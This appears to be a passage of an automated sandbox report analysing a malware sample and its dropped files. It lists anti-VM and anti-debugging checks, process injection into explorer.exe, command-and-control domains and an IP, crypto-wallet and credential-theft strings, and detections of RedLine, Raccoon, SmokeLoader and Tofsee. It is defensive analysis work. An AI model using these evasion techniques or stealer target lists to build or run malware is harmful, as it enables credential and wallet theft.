Source: C:\Users\user\AppData\Local\Temp\8433.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: pAWNholT8X.exe, 00000004.00000002.435547684.000000000072A000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\FE25.exe RDTSC instruction interceptor: First address: 00000000017D47ED second address: 00000000017D47FF instructions: 0x00000000 rdtsc 0x00000002 dec ecx 0x00000003 or esi, 19626E18h 0x00000009 inc ecx 0x0000000a pop edx 0x0000000b dec eax 0x0000000c cdq 0x0000000d inc ecx 0x0000000e dec bl 0x00000010 inc ecx 0x00000011 pop ebx 0x00000012 rdtsc
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6120 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe TID: 6264 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe TID: 6736 Thread sleep time: -48000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\757C.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 573 Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\8433.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.422145782.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000006.00000000.422273157.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 757C.exe, 00000016.00000002.688075628.0000000006665000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000006.00000000.399222853.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.422145782.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.404675893.0000000008551000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$t<a
Source: svchost.exe, 0000000D.00000002.502918415.000001D408270000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: explorer.exe, 00000006.00000000.399222853.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000000D.00000002.503887822.000001D4082EB000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R
Source: explorer.exe, 00000006.00000000.421771506.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000006.00000000.421771506.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: 757C.exe, 00000016.00000002.688075628.0000000006665000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareB7WSVAM5Win32_VideoControllerM7PFZW8UVideoController120060621000000.000000-00019543348display.infMSBDAWDBGRY9PPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP9LS9DUN
Source: explorer.exe, 00000006.00000000.422273157.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000006.00000000.376541265.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\8433.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\8433.exe Thread information set: HideFromDebugger Jump to behavior
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\pAWNholT8X.exe System information queried: CodeIntegrityInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe System information queried: CodeIntegrityInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 0_2_00405286
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00656F53 push dword ptr fs:[00000030h] 0_2_00656F53
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00590042 push dword ptr fs:[00000030h] 15_2_00590042
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00766633 push dword ptr fs:[00000030h] 15_2_00766633
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00730042 push dword ptr fs:[00000030h] 16_2_00730042
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_007A6B2B push dword ptr fs:[00000030h] 16_2_007A6B2B
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004034A5
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_2_0040288D LdrLoadDll, 4_2_0040288D
Source: C:\Users\user\AppData\Local\Temp\757C.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_0040782F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040782F
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004034A5
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00403977 SetUnhandledExceptionFilter, 0_2_00403977
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00404BF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00404BF5
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_0040782F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0040782F
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_004034A5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_004034A5
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00403977 SetUnhandledExceptionFilter, 16_2_00403977
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00404BF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00404BF5

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: nityanneron5.top
Source: C:\Windows\explorer.exe Domain query: lynettaram7.top
Source: C:\Windows\explorer.exe Domain query: umayaniela6.top
Source: C:\Windows\explorer.exe Domain query: jebeccallis4.top
Source: C:\Windows\explorer.exe Domain query: privacy-toolz-for-you-403.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: sadineyalas8.top
Source: C:\Windows\explorer.exe Domain query: naghenrietti1.top
Source: C:\Windows\explorer.exe Domain query: geenaldencia9.top
Source: C:\Windows\explorer.exe Domain query: kimballiett2.top
Source: C:\Windows\explorer.exe Domain query: xadriettany3.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: ecrjwib.6.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\pAWNholT8X.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ecrjwib Memory written: C:\Users\user\AppData\Roaming\ecrjwib base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Memory written: C:\Users\user\AppData\Local\Temp\6CB1.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Memory written: C:\Users\user\AppData\Local\Temp\757C.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 15_2_00590110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Thread created: C:\Windows\explorer.exe EIP: 2DC1A20 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Thread created: unknown EIP: 4151A20 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\ecrjwib Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe Jump to behavior
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000006.00000000.394707551.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: GetLocaleInfoA, 0_2_00408A02
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: GetLocaleInfoA, 16_2_00408A02
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Users\user\AppData\Local\Temp\757C.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Users\user\AppData\Local\Temp\757C.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_004014CC GetSystemTimeAsFileTime,_ftell,_fseek, 0_2_004014CC

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: 8433.exe, 00000013.00000002.697272748.0000000006C5B000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 22.2.757C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.8433.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.620846054.0000000000303000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.588446191.0000000001030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.649232552.0000000001212000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.644471318.0000000000BB3000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 757C.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8433.exe PID: 1292, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 20.1.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.6CB1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.pAWNholT8X.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.435450242.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504353493.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match File source: 0000001E.00000002.653738313.000000000114D000.00000002.00020000.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 00000023.00000002.626408703.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.600346866.0000000000630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.639383457.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: Electrum
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 757C.exe, 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqliteUnknownExtension\Program Files (x86)\configArmorydisplayNamehost_keyNametdataSELECT * FROM \EWarningxodWarningusexpires_utc\Program Data\coMANGOokies.sqMANGOliteAFileSystemntivFileSystemirusPrFileSystemoduFileSystemct|AntiFileSystemSpyWFileSystemareProFileSystemduct|FireFileSystemwallProdFileSystemuct*ssfn*DisplayVersion%localappdata%\-*.lo--gLocalPrefs.jsonOpHandlerenVPHandlerN ConHandlernect%DSK_23%cmdOpera GXcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeROOT\SecurityCenterROOT\SecurityCenter2Web DataSteamPathwaasflleasft.datasfCommandLine\Telegram Desktop\tdataSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesTotalVisibleMemorySizeis_secureSoftware\Valve\SteamLogin DataID: isSecureegram.exeNoDefrdDefVPNDefwaasflletasf%useStringBuilderrproStringBuilderfile%\DStringBuilderocuStringBuildermeStringBuilderntsv11\Program Files\\ElBPOTE6AJIectruBPOTE6AJIm\wallBPOTE6AJIetsOpera GX StableSELECT * FROM Win32_Process Where SessionId='*.json\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnameProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueLocal Extension SettingsNWinordVWinpn.eWinxe*WinhostEWarningxodWarningusmoz_cookiesUser Datawindows-1251, CommandLine: \CCollectionoinCollectionomCollectioniDisplayName*.walletexpiry\EExceptionxodExceptionus\exodExceptionus.walExceptionletTel*.vstring.ReplacedfJaxxpath
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: \Ethereum\wallets
Source: svchost.exe, 0000000D.00000003.459986955.000001D408BC9000.00000004.00000001.sdmp String found in binary or memory: 2\r\n" \tResident Evil 2\r\n" \tMetro Exodus\r\n" \tForza Horizon 4\r\n" \tAnd more & \r\n \r\nMOVIES AND TV\r\nGo inside the story with immersive audio for your favorite shows and movies. Find Dolby Atmos content on:\r\n" \tNetflix"!\r\n" \tDisney+\r\n" \tMicrosoft Movies & TV\r\n" \tAmazon Prime Video\r\n" \tiQiyi\r\n" \tVUDU
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: Ethereum(Xq
Source: 757C.exe, 00000016.00000002.675926430.0000000002E3F000.00000004.00000001.sdmp String found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 8433.exe String found in binary or memory: set_UseMachineKeyStore
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 757C.exe PID: 6664, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected RedLine Stealer
Source: Yara match File source: 22.2.757C.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.8433.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.757C.exe.3effc88.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000016.00000002.620551936.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502575031.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
